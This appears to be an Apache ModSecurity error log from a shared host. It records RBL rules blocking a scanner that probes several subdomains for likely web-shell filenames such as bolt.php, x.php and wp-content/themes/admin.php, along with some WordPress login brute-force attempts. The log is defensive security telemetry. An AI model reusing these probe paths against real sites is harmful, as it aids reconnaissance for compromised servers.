[Tue May 26 19:37:42.221461 2026] [security2:error] [pid 70836:tid 70921] [remote 193.42.61.12:52934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwGgAA5FQ"]
[Tue May 26 19:37:42.256323 2026] [security2:error] [pid 70836:tid 70953] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-mail.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwLwAA23Q"]
[Tue May 26 19:37:42.261235 2026] [security2:error] [pid 70836:tid 70927] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/bolt.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwMAAAzFo"]
[Tue May 26 19:37:42.286331 2026] [security2:error] [pid 70836:tid 70935] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-admin/wp.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwMgAA1mI"]
[Tue May 26 19:37:42.332882 2026] [security2:error] [pid 70836:tid 70936] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/bolt.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwNQAA-GM"]
[Tue May 26 19:37:42.338078 2026] [security2:error] [pid 70836:tid 70937] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/bthil.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwNgABBGQ"]
[Tue May 26 19:37:42.361546 2026] [security2:error] [pid 70836:tid 70940] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/bgymj.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwNwAAtWc"]
[Tue May 26 19:37:42.413363 2026] [security2:error] [pid 70836:tid 70922] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/bthil.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwOAAAhlU"]
[Tue May 26 19:37:42.423374 2026] [proxy:error] [pid 70836:tid 70944] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:42.423421 2026] [proxy_http:error] [pid 70836:tid 70944] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:42.424008 2026] [proxy:error] [pid 70836:tid 70944] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:42.424057 2026] [proxy_http:error] [pid 70836:tid 70944] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:42.436104 2026] [security2:error] [pid 70836:tid 70945] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/aa.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwOgAArGw"]
[Tue May 26 19:37:42.506312 2026] [security2:error] [pid 70836:tid 70958] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/x.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwPwAAs3k"]
[Tue May 26 19:37:42.511411 2026] [security2:error] [pid 70836:tid 70929] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-mail.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwQAAAuVw"]
[Tue May 26 19:37:42.579306 2026] [security2:error] [pid 70836:tid 70839] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/x.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwRAAAxQI"]
[Tue May 26 19:37:42.584277 2026] [security2:error] [pid 70836:tid 70837] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/index/function.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwRQAAngA"]
[Tue May 26 19:37:42.586146 2026] [security2:error] [pid 70836:tid 70946] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/bolt.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwRgAAo20"]
[Tue May 26 19:37:42.669803 2026] [security2:error] [pid 70836:tid 70949] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/index/function.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwSgAA73A"]
[Tue May 26 19:37:42.670245 2026] [security2:error] [pid 70836:tid 70948] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/bthil.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwSwAAwW8"]
[Tue May 26 19:37:42.676176 2026] [security2:error] [pid 70836:tid 70947] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/aaa.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwTAAA1W4"]
[Tue May 26 19:37:42.745982 2026] [security2:error] [pid 70836:tid 70951] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/aaa.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwVAAArXI"]
[Tue May 26 19:37:42.752973 2026] [security2:error] [pid 70836:tid 70885] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/abcd.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwVQAApjA"]
[Tue May 26 19:37:42.824734 2026] [security2:error] [pid 70836:tid 70954] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/abcd.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwXAAApHU"]
[Tue May 26 19:37:42.831299 2026] [security2:error] [pid 70836:tid 70841] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-good.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwXQAA8AQ"]
[Tue May 26 19:37:42.900029 2026] [security2:error] [pid 70836:tid 70845] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-good.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwYQAA9gg"]
[Tue May 26 19:37:42.908752 2026] [security2:error] [pid 70836:tid 70843] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/simple.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwYgAAhwY"]
[Tue May 26 19:37:42.923673 2026] [security2:error] [pid 70836:tid 70844] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/x.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwYwAA0gc"]
[Tue May 26 19:37:42.977618 2026] [security2:error] [pid 70836:tid 70846] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/simple.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwZAAA7Qk"]
[Tue May 26 19:37:42.986326 2026] [security2:error] [pid 70836:tid 70847] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/edit-tags.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwZQAAwwo"]
[Tue May 26 19:37:42.999399 2026] [security2:error] [pid 70836:tid 70848] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/index/function.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwZgAApws"]
[Tue May 26 19:37:43.055732 2026] [security2:error] [pid 70836:tid 70849] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/edit-tags.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwZwAAygw"]
[Tue May 26 19:37:43.063659 2026] [security2:error] [pid 70836:tid 70850] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/u.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwaAAA6g0"]
[Tue May 26 19:37:43.074693 2026] [security2:error] [pid 70836:tid 70840] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/aaa.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwagAAnwM"]
[Tue May 26 19:37:43.136440 2026] [security2:error] [pid 70836:tid 70853] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/u.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwawAA1xA"]
[Tue May 26 19:37:43.141022 2026] [security2:error] [pid 70836:tid 70851] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-content/themes/admin.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwbAAA7g4"]
[Tue May 26 19:37:43.149763 2026] [security2:error] [pid 70836:tid 70852] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/abcd.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwbgAA8w8"]
[Tue May 26 19:37:43.212181 2026] [security2:error] [pid 70836:tid 70855] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-content/themes/admin.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwdAAAiRI"]
[Tue May 26 19:37:43.218195 2026] [security2:error] [pid 70836:tid 70856] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/h.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwdQAA9RM"]
[Tue May 26 19:37:43.221076 2026] [security2:error] [pid 70836:tid 71013] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwWQAAALQ"]
[Tue May 26 19:37:43.224573 2026] [security2:error] [pid 70836:tid 70860] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-good.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwdgAArxc"]
[Tue May 26 19:37:43.288092 2026] [security2:error] [pid 70836:tid 70842] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/h.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwegAAjAU"]
[Tue May 26 19:37:43.298568 2026] [security2:error] [pid 70836:tid 70859] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/ms-edit.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwewAAtxY"]
[Tue May 26 19:37:43.307046 2026] [security2:error] [pid 70836:tid 70858] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/simple.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwfAAA0RU"]
[Tue May 26 19:37:43.363838 2026] [security2:error] [pid 70836:tid 70862] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/ms-edit.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwgAAA_hk"]
[Tue May 26 19:37:43.375705 2026] [security2:error] [pid 70836:tid 70869] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/a7.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwgQAA-CA"]
[Tue May 26 19:37:43.381739 2026] [security2:error] [pid 70836:tid 70868] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/edit-tags.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwggABBB8"]
[Tue May 26 19:37:43.439748 2026] [security2:error] [pid 70836:tid 70861] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/a7.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwgwAAtRg"]
[Tue May 26 19:37:43.452820 2026] [security2:error] [pid 70836:tid 70854] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/manager.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwhAAAlBE"]
[Tue May 26 19:37:43.457255 2026] [security2:error] [pid 70836:tid 70863] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/u.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwhQAAhho"]
[Tue May 26 19:37:43.515477 2026] [security2:error] [pid 70836:tid 70870] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/manager.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwiwAAjSE"]
[Tue May 26 19:37:43.529237 2026] [security2:error] [pid 70836:tid 70864] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/w1.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwjQAAuRs"]
[Tue May 26 19:37:43.532384 2026] [security2:error] [pid 70836:tid 70867] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-content/themes/admin.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwjgAA3h4"]
[Tue May 26 19:37:43.591166 2026] [security2:error] [pid 70836:tid 70875] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/w1.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwkAAAmCY"]
[Tue May 26 19:37:43.607227 2026] [security2:error] [pid 70836:tid 70878] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/h.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwkQAA0Ck"]
[Tue May 26 19:37:43.609074 2026] [proxy:error] [pid 70836:tid 70871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:43.609132 2026] [proxy_http:error] [pid 70836:tid 70871] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:43.609750 2026] [proxy:error] [pid 70836:tid 70871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:43.609794 2026] [proxy_http:error] [pid 70836:tid 70871] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:43.673196 2026] [security2:error] [pid 70836:tid 70972] [client 46.8.22.136:47447] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwaQAAAIs"], referer: https://anujtradingco.com
[Tue May 26 19:37:43.685791 2026] [security2:error] [pid 70836:tid 70873] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/ms-edit.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwlAAA9CQ"]
[Tue May 26 19:37:43.721120 2026] [security2:error] [pid 70836:tid 70866] [remote 103.91.67.202:20696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwjwAAvx0"]
[Tue May 26 19:37:43.760693 2026] [security2:error] [pid 70836:tid 70877] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/a7.php"] [unique_id "ahWpL-_FvbQ_BhqVMRVwlwAAnig"]
